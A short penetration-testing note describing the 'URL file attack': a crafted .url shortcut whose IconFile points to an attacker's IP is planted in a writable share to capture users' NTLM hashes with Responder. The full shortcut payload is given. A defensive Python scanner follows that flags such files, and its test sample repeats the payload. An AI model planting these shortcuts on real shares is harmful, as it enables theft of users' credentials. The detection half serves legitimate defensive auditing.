URL File Attack

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Active Directory Attack.md#scf-and-url-file-attack-against-writeable-share

Assume a scenario where we have compromised a user who has access to a file share. We can use this access to capture hashes using Responder. This requires either a compromised user account or an open file share.

In the shared folder, create a file named "@something.url" (include the quotation marks as well).

Inside the file, paste the following content, replacing the IP with the Kali IP:

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\x.x.x.x\%USERNAME%.icon
IconIndex=1
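From the defender's side, the same file format can be audited. The following is an added example, not part of the original page: it scans a share for .url files whose IconFile, URL or WorkingDirectory value points at a remote host. The function names and the sample address 192.0.2.10 are assumptions made for illustration.

```python
import os
import re

# Keys in an [InternetShortcut] section that Windows may resolve as a path.
PATH_KEYS = {"iconfile", "url", "workingdirectory"}
# UNC path (\\host\...), //host/... or file://host/... ; captures the host part.
REMOTE = re.compile(r"^(?:\\\\|//|file://)([^\\/]+)[\\/]", re.IGNORECASE)

def remote_refs(text):
    """Return [(key, host, value)] for shortcut keys that point at a remote host."""
    hits = []
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if not sep or key.strip().lower() not in PATH_KEYS:
            continue  # section header, blank line, or a key we do not audit
        m = REMOTE.match(value.strip())
        if m:
            hits.append((key.strip(), m.group(1), value.strip()))
    return hits

def scan_share(root):
    """Walk a share and yield (path, hits) for every .url file with remote refs."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".url"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = remote_refs(fh.read())
            if hits:
                yield path, hits

# Constructed samples: 192.0.2.10 is a documentation address, not from the page.
SUSPICIOUS = ("[InternetShortcut]\nURL=blah\nWorkingDirectory=blah\n"
              "IconFile=\\\\192.0.2.10\\%USERNAME%.icon\nIconIndex=1\n")
BENIGN = ("[InternetShortcut]\nURL=https://intranet.example/\n"
          "IconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=1\n")

if __name__ == "__main__":
    print(remote_refs(SUSPICIOUS))  # one hit on IconFile
    print(remote_refs(BENIGN))      # no hits
```

Run `scan_share` against the share root from an account with read access; a hit naming a host that is not one of your own file servers is worth investigating.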
